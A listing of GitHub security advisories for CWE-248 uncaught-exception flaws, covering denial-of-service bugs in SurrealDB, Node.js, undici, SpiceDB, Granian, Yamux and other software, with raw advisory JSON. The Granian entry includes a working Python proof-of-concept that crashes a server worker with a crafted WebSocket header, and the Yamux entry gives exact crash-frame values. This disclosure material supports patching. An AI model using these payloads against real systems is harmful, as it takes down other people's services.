Common Weakness Enumeration

CWE-248

Allowed

Uncaught Exception

Abstraction: Base · Status: Draft

An exception is thrown from a function, but it is not caught.

420 vulnerabilities reference this CWE, most recent first.

GHSA-R9WJ-GM7P-2529

Vulnerability from github – Published: 2025-08-05 21:31 – Updated: 2025-10-02 18:30
VLAI
Details

A denial-of-service vulnerability exists in Sysax Multi-Server version 6.10 via its SSH daemon. A specially crafted SSH key exchange packet can trigger a crash in the service, resulting in loss of availability. The flaw is triggered during the handling of malformed key exchange data, including a non-standard byte (\x28) in place of the expected SSH protocol delimiter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-10065"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-05T20:15:35Z",
    "severity": "HIGH"
  },
  "details": "A denial-of-service vulnerability exists in\u00a0Sysax Multi-Server version 6.10 via its SSH daemon. A specially crafted SSH key exchange packet can trigger a crash in the service, resulting in loss of availability. The flaw is triggered during the handling of malformed key exchange data, including a non-standard byte (\\x28) in place of the expected SSH protocol delimiter.",
  "id": "GHSA-r9wj-gm7p-2529",
  "modified": "2025-10-02T18:30:56Z",
  "published": "2025-08-05T21:31:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10065"
    },
    {
      "type": "WEB",
      "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb"
    },
    {
      "type": "WEB",
      "url": "https://www.mattandreko.com/2013/04/08/sysax-multi-server-6.10-ssh-dos"
    },
    {
      "type": "WEB",
      "url": "https://www.sysax.com"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/sysax-multi-server-sshd-key-exchange-dos"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-RJV5-CQP8-H968

Vulnerability from github – Published: 2025-09-17 18:31 – Updated: 2025-09-17 18:31
VLAI
Details

CISA Thorium uses '.unwrap()' to handle errors related to account verification email messages. An unauthenticated remote attacker could cause a crash by providing a specially crafted email address or response. Fixed in commit 6a65a27.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-35436"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-17T17:15:44Z",
    "severity": "MODERATE"
  },
  "details": "CISA Thorium uses \u0027.unwrap()\u0027 to handle errors related to account verification email messages. An unauthenticated remote attacker could cause a crash by providing a specially crafted email address or response. Fixed in commit 6a65a27.",
  "id": "GHSA-rjv5-cqp8-h968",
  "modified": "2025-09-17T18:31:18Z",
  "published": "2025-09-17T18:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-35436"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mjcarson/thorium/commit/6a65a2711fb2387e8c3eacebc774053741bf5aeb"
    },
    {
      "type": "WEB",
      "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-259-01.json"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-35436"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-RQ86-9M6R-CM3G

Vulnerability from github – Published: 2025-04-10 21:05 – Updated: 2025-04-10 21:05
VLAI
Summary
SurrealDB has uncaught exception in Net module that leads to database crash
Details

A vulnerability was found where an attacker can crash the database via crafting a HTTP query that returns a null byte. The problem relies on an uncaught exception in the net module, where the result of the query will be converted to JSON before showing as the HTTP response to the user in the /sql endpoint.

Impact

This vulnerability allows any authenticated user to crash a SurrealDB instance by sending a crafted query with a null byte to the /sql endpoint.

Where SurrealDB is used as an application backend, it is possible that an application user can crash the SurrealDB instance and thus the supported application through crafted inputs that exploit this attack vector.

Patches

A patch has been introduced that ensures the error is caught and converted as an error. - Versions 2.2.2, 2.1.5 and 2.0.5 and later are not affected by this isssue

Workarounds

Affected users who are unable to update may want to limit the ability of untrusted clients to run arbitrary queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.

Where SurrealDB is used as an application backend, ensure sanitisation of input at the application layer to prevent injection attacks.

References

https://github.com/surrealdb/surrealdb/pull/5647

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "surrealdb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "surrealdb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.0"
            },
            {
              "fixed": "2.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "surrealdb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-10T21:05:34Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "A vulnerability was found where an attacker can crash the database via crafting a HTTP query that returns a null byte. The problem relies on an uncaught exception in the `net` module, where the result of the query will be converted to JSON before showing as the HTTP response to the user in the **/sql** endpoint.\n\n### Impact\nThis vulnerability allows any authenticated user to crash a SurrealDB instance by sending a crafted query with a null byte to the /sql endpoint. \n\nWhere SurrealDB is used as an application backend, it is possible that an application user can crash the SurrealDB instance and thus the supported application through crafted inputs that exploit this attack vector.\n\n\n### Patches\nA patch has been introduced that ensures the error is caught and converted as an error.\n- Versions 2.2.2, 2.1.5 and 2.0.5 and later are not affected by this isssue\n\n### Workarounds\n\nAffected users who are unable to update may want to limit the ability of untrusted clients to run arbitrary queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.\n\nWhere SurrealDB is used as an application backend, ensure sanitisation of input at the application layer to prevent injection attacks.\n\n### References\nhttps://github.com/surrealdb/surrealdb/pull/5647",
  "id": "GHSA-rq86-9m6r-cm3g",
  "modified": "2025-04-10T21:05:35Z",
  "published": "2025-04-10T21:05:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/surrealdb/surrealdb/security/advisories/GHSA-rq86-9m6r-cm3g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/surrealdb/surrealdb/pull/5647"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/surrealdb/surrealdb"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SurrealDB has uncaught exception in Net module that leads to database crash"
}

GHSA-RRJV-57MM-J6CM

Vulnerability from github – Published: 2025-05-19 03:30 – Updated: 2025-05-19 03:30
VLAI
Details

The C++ method SignTraits::DeriveBits() may incorrectly call ThrowException() based on user-supplied inputs when executing in a background thread, crashing the Node.js process. Such cryptographic operations are commonly applied to untrusted inputs. Thus, this mechanism potentially allows an adversary to remotely crash a Node.js runtime.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-23166"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-19T02:15:17Z",
    "severity": "HIGH"
  },
  "details": "The C++ method SignTraits::DeriveBits() may incorrectly call ThrowException() based on user-supplied inputs when executing in a background thread, crashing the Node.js process. Such cryptographic operations are commonly applied to untrusted inputs. Thus, this mechanism potentially allows an adversary to remotely crash a Node.js runtime.",
  "id": "GHSA-rrjv-57mm-j6cm",
  "modified": "2025-05-19T03:30:29Z",
  "published": "2025-05-19T03:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23166"
    },
    {
      "type": "WEB",
      "url": "https://nodejs.org/en/blog/vulnerability/may-2025-security-releases"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V554-GP5G-23RQ

Vulnerability from github – Published: 2025-10-23 06:31 – Updated: 2025-10-23 06:31
VLAI
Details

Uncaught Exception (CWE-248) in the Command Centre Server allows an Authorized and Privileged Operator to crash the Command Centre Server at will.

This issue affects Command Centre Server:

9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-48430"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-23T04:16:40Z",
    "severity": "MODERATE"
  },
  "details": "Uncaught Exception (CWE-248) in the Command Centre Server allows an Authorized and Privileged Operator to crash the Command Centre Server at will.\n\nThis issue affects Command Centre Server: \n\n9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior.",
  "id": "GHSA-v554-gp5g-23rq",
  "modified": "2025-10-23T06:31:00Z",
  "published": "2025-10-23T06:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48430"
    },
    {
      "type": "WEB",
      "url": "https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-48430"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V96G-5J57-774C

Vulnerability from github – Published: 2025-04-29 12:30 – Updated: 2025-07-28 15:31
VLAI
Details

A flaw was found in the mod_auth_openidc module for Apache httpd. This flaw allows a remote, unauthenticated attacker to trigger a denial of service by sending an empty POST request when the OIDCPreservePost directive is enabled. The server crashes consistently, affecting availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-3891"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-29T12:15:32Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in the mod_auth_openidc module for Apache httpd. This flaw allows a remote, unauthenticated attacker to trigger a denial of service by sending an empty POST request when the OIDCPreservePost directive is enabled. The server crashes consistently, affecting availability.",
  "id": "GHSA-v96g-5j57-774c",
  "modified": "2025-07-28T15:31:35Z",
  "published": "2025-04-29T12:30:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenIDC/mod_auth_openidc/security/advisories/GHSA-x7cf-8wgv-5j86"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3891"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OpenIDC/mod_auth_openidc/commit/6a0b5f66c87184dfe0e4400f6bdd46a82dc0ec2b"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:10002"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:10003"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:10004"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:10006"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:10007"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:10008"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:10010"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:4597"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:9396"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2025-3891"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2361633"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00007.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V9P9-HFJ2-HCW8

Vulnerability from github – Published: 2026-03-13 20:41 – Updated: 2026-03-13 20:41
VLAI
Summary
Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation
Details

Impact

The undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.

The vulnerability exists because:

  1. The isValidClientWindowBits() function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15
  2. The createInflateRaw() call is not wrapped in a try-catch block
  3. The resulting exception propagates up through the call stack and crashes the Node.js process

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2229"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:41:41Z",
    "nvd_published_at": "2026-03-12T21:16:25Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib\u0027s valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
  "id": "GHSA-v9p9-hfj2-hcw8",
  "modified": "2026-03-13T20:41:41Z",
  "published": "2026-03-13T20:41:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3487486"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "WEB",
      "url": "https://datatracker.ietf.org/doc/html/rfc7692"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    },
    {
      "type": "WEB",
      "url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation"
}

GHSA-VHVQ-FV9F-WH4Q

Vulnerability from github – Published: 2026-02-06 22:30 – Updated: 2026-02-06 22:30
VLAI
Summary
LookupResources Cursor section tampering can crash SpiceDB process via tuple.MustParse panic
Details

Description

A malformed or tampered-with LookupResources Cursor token can cause a panic in the SpiceDB process if it fails to parse. If an attacker were able to make requests to a SpiceDB instance, they could affect its availability.

Reproduction

If one was to take a cursor from a LookupResources call, decode it according to the logic that SpiceDB uses, and modify the Sections field to include an invalid relationship string, the process will panic.

Impact

An attacker would need both the ability to create a gRPC connection to your SpiceDB instance and a valid token, or else the ability to pass a cursor token from outside your application through to your SpiceDB instance.

If an attacker had this ability, they could bring down SpiceDB instances, reducing the availability of SpiceDB and any service that depends on it.

Mechanism

The SpiceDB process does not validate the contents of this Sections component of the Cursor message. In affected versions, it uses a parsing function that calls panic if the value cannot be parsed as a relationship.

Fix

This issue was fixed in https://github.com/authzed/spicedb/pull/2878.

Remediations

  • Prevent client control of the optional_cursor field in LookupResources calls
  • Upgrade to an unaffected version
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/authzed/spicedb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.29.3"
            },
            {
              "fixed": "1.49.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-06T22:30:52Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "## Description\nA malformed or tampered-with LookupResources [Cursor token](https://buf.build/authzed/api/docs/main:authzed.api.v1#authzed.api.v1.Cursor) can cause a panic in the SpiceDB process if it fails to parse. If an attacker were able to make requests to a SpiceDB instance, they could affect its availability.\n\n## Reproduction\nIf one was to take a cursor from a LookupResources call, decode it according to the logic that SpiceDB uses, and modify the Sections field to include an invalid relationship string, the process will panic.\n\n## Impact\nAn attacker would need both the ability to create a gRPC connection to your SpiceDB instance and a valid token, or else the ability to pass a cursor token from outside your application through to your SpiceDB instance.\n\nIf an attacker had this ability, they could bring down SpiceDB instances, reducing the availability of SpiceDB and any service that depends on it.\n\n## Mechanism\nThe SpiceDB process does not validate the contents of this `Sections` component of the `Cursor` message. In affected versions, it uses a parsing function that calls `panic` if the value cannot be parsed as a relationship. \n\n## Fix\nThis issue was fixed in https://github.com/authzed/spicedb/pull/2878.\n\n## Remediations\n* Prevent client control of the `optional_cursor` field in `LookupResources` calls\n* Upgrade to an unaffected version",
  "id": "GHSA-vhvq-fv9f-wh4q",
  "modified": "2026-02-06T22:30:52Z",
  "published": "2026-02-06T22:30:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/authzed/spicedb/security/advisories/GHSA-vhvq-fv9f-wh4q"
    },
    {
      "type": "WEB",
      "url": "https://github.com/authzed/spicedb/pull/2878"
    },
    {
      "type": "WEB",
      "url": "https://github.com/authzed/spicedb/commit/fa1d7f48107e0c6c35e6a7862aa983366e70208f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/authzed/spicedb"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LookupResources Cursor section tampering can crash SpiceDB process via tuple.MustParse panic"
}

GHSA-VRG7-482J-P6F6

Vulnerability from github – Published: 2026-05-06 21:20 – Updated: 2026-05-13 16:41
VLAI
Summary
Granian vulnerable to unauthenticated DoS via WebSocket subprotocol header panic
Details

Summary

Granian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose Sec-WebSocket-Protocol header contains non-ASCII bytes.

The crash happens in Granian's WebSocket scope construction path, before the ASGI application is invoked.

This is a single-request Denial Of Service against one worker. Repeating the request across workers takes the service offline.

Details

https://github.com/emmett-framework/granian/blob/bdd5b0fbbb2aca6f2f4c0d2700c244d190958035/src/asgi/utils.rs#L122-L125

HeaderValue::to_str() returns Err for bytes outside visible ASCII. The subsequent .unwrap() panics.

In release builds Granian sets panic = "abort", so this panic terminates the worker instead of being handled as a normal request error.

PoC

Step 1.

starts a Granian ASGI server

# app.py
async def app(scope, receive, send):
    if scope["type"] == "websocket":
        await receive()
        await send({"type": "websocket.accept"})
        return

    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"ok"})
granian --interface asgi app:app --host 127.0.0.1 --port 8000

Step 2.

sending a raw upgrade request with Sec-WebSocket-Protocol: \x80\xff reached this code path and caused the worker to abort.

# ws-subproto-crash.py
import base64, os, socket, sys

host, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
key = base64.b64encode(os.urandom(16)).decode()

req = (
    f"GET {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
    "Upgrade: websocket\r\nConnection: Upgrade\r\n"
    f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n"
).encode() + b"Sec-WebSocket-Protocol: \x80\xff\r\n\r\n"

with socket.create_connection((host, port), timeout=5) as s:
    s.sendall(req)
    print(s.recv(4096))
python ws-subproto-crash.py 127.0.0.1 8000 /

Observed server output:

thread '<unnamed>' panicked at src/asgi/utils.rs:125:44:
called `Result::unwrap()` on an `Err` value: ToStrError { _priv: () }
[ERROR] Unexpected exit from worker-1
[INFO] Shutting down granian

Impact

  • Unauthenticated remote denial of service
  • One crafted request kills one worker
  • The application is never reached, so application-level authentication or routing does not mitigate the issue
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "granian"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.0"
            },
            {
              "fixed": "2.7.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42544"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-248",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T21:20:48Z",
    "nvd_published_at": "2026-05-12T22:16:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nGranian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose `Sec-WebSocket-Protocol` header contains non-ASCII bytes.\n\nThe crash happens in Granian\u0027s WebSocket scope construction path, before the ASGI application is invoked.\n\nThis is a single-request Denial Of Service against one worker. Repeating the request across workers takes the service offline.\n\n### Details\n\nhttps://github.com/emmett-framework/granian/blob/bdd5b0fbbb2aca6f2f4c0d2700c244d190958035/src/asgi/utils.rs#L122-L125\n\n`HeaderValue::to_str()` returns `Err` for bytes outside visible ASCII. The subsequent `.unwrap()` panics.\n\nIn release builds Granian sets `panic = \"abort\"`, so this panic terminates the worker instead of being handled as a normal request error.\n\n\n### PoC\n\n#### Step 1.\nstarts a Granian ASGI server\n\n```python\n# app.py\nasync def app(scope, receive, send):\n    if scope[\"type\"] == \"websocket\":\n        await receive()\n        await send({\"type\": \"websocket.accept\"})\n        return\n\n    await send({\"type\": \"http.response.start\", \"status\": 200, \"headers\": []})\n    await send({\"type\": \"http.response.body\", \"body\": b\"ok\"})\n```\n\n```bash\ngranian --interface asgi app:app --host 127.0.0.1 --port 8000\n```\n\n#### Step 2.\nsending a raw upgrade request with `Sec-WebSocket-Protocol: \\x80\\xff` reached this code path and caused the worker to abort.\n\n```python\n# ws-subproto-crash.py\nimport base64, os, socket, sys\n\nhost, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]\nkey = base64.b64encode(os.urandom(16)).decode()\n\nreq = (\n    f\"GET {path} HTTP/1.1\\r\\nHost: {host}:{port}\\r\\n\"\n    \"Upgrade: websocket\\r\\nConnection: Upgrade\\r\\n\"\n    f\"Sec-WebSocket-Key: {key}\\r\\nSec-WebSocket-Version: 13\\r\\n\"\n).encode() + b\"Sec-WebSocket-Protocol: \\x80\\xff\\r\\n\\r\\n\"\n\nwith socket.create_connection((host, port), timeout=5) as s:\n    s.sendall(req)\n    print(s.recv(4096))\n```\n```bash\npython ws-subproto-crash.py 127.0.0.1 8000 /\n```\n\n\nObserved server output:\n\n```\nthread \u0027\u003cunnamed\u003e\u0027 panicked at src/asgi/utils.rs:125:44:\ncalled `Result::unwrap()` on an `Err` value: ToStrError { _priv: () }\n[ERROR] Unexpected exit from worker-1\n[INFO] Shutting down granian\n```\n\n\n### Impact\n\n- Unauthenticated remote denial of service\n- One crafted request kills one worker\n- The application is never reached, so application-level authentication or routing does not mitigate the issue",
  "id": "GHSA-vrg7-482j-p6f6",
  "modified": "2026-05-13T16:41:24Z",
  "published": "2026-05-06T21:20:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/emmett-framework/granian/security/advisories/GHSA-vrg7-482j-p6f6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42544"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/emmett-framework/granian"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Granian vulnerable to unauthenticated DoS via WebSocket subprotocol header panic"
}

GHSA-VXX9-2994-Q338

Vulnerability from github – Published: 2026-03-13 20:04 – Updated: 2026-03-16 22:01
VLAI
Summary
Yamux vulnerable to remote Panic via malformed Data frame with SYN set and len = 262145
Details

Summary

The Rust implementation of Yamux can panic when processing a crafted inbound Data frame that sets SYN and uses a body length greater than DEFAULT_CREDIT (e.g. 262145). On the first packet of a new inbound stream, stream state is created and a receiver is queued before oversized-body validation completes. When validation fails, the temporary stream is dropped and cleanup may call remove(...).expect("stream not found"), triggering a panic in the connection state machine. This is remotely reachable over a normal Yamux session and does not require authentication. kind of vulnerability is it? Who is

Attack Scenario

An attacker that can establish a Yamux session with a target node can crash the target by sending a single validly encoded Yamux Data|SYN frame with an oversized body: 1. Establish a standard authenticated transport session that negotiates Yamux. 2. Send one Yamux frame with: - Tag = Data - Flags = SYN - StreamId = 1 (or any new inbound stream id) - Length = DEFAULT_CREDIT + 1 (e.g. 262145) - Body of matching size This can trigger a panic (stream not found) and terminate the process, depending on host application panic policy.

Patches

Users should upgrade to yamux v0.13.10

This vulnerability was originally submitted by @revofusion to the Ethereum Foundation bug bounty program

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "yamux"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.13.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32314"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248",
      "CWE-617"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:04:38Z",
    "nvd_published_at": "2026-03-16T14:19:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe Rust implementation of Yamux can panic when processing a crafted inbound Data frame that sets SYN and uses a body length greater than DEFAULT_CREDIT (e.g. 262145).\nOn the first packet of a new inbound stream, stream state is created and a receiver is queued before oversized-body validation completes. When validation fails, the temporary stream is dropped and cleanup may call remove(...).expect(\"stream not found\"), triggering a panic in the connection state machine.\nThis is remotely reachable over a normal Yamux session and does not require authentication. kind of vulnerability is it? Who is \n#### Attack Scenario  \nAn attacker that can establish a Yamux session with a target node can crash the target by sending a single validly encoded Yamux Data|SYN frame with an oversized body:\n1. Establish a standard authenticated transport session that negotiates Yamux.\n2. Send one Yamux frame with:\n   - Tag = Data\n   - Flags = SYN\n   - StreamId = 1 (or any new inbound stream id)\n   - Length = DEFAULT_CREDIT + 1 (e.g. 262145)\n   - Body of matching size\nThis can trigger a panic (stream not found) and terminate the process, depending on host application panic policy.\n### 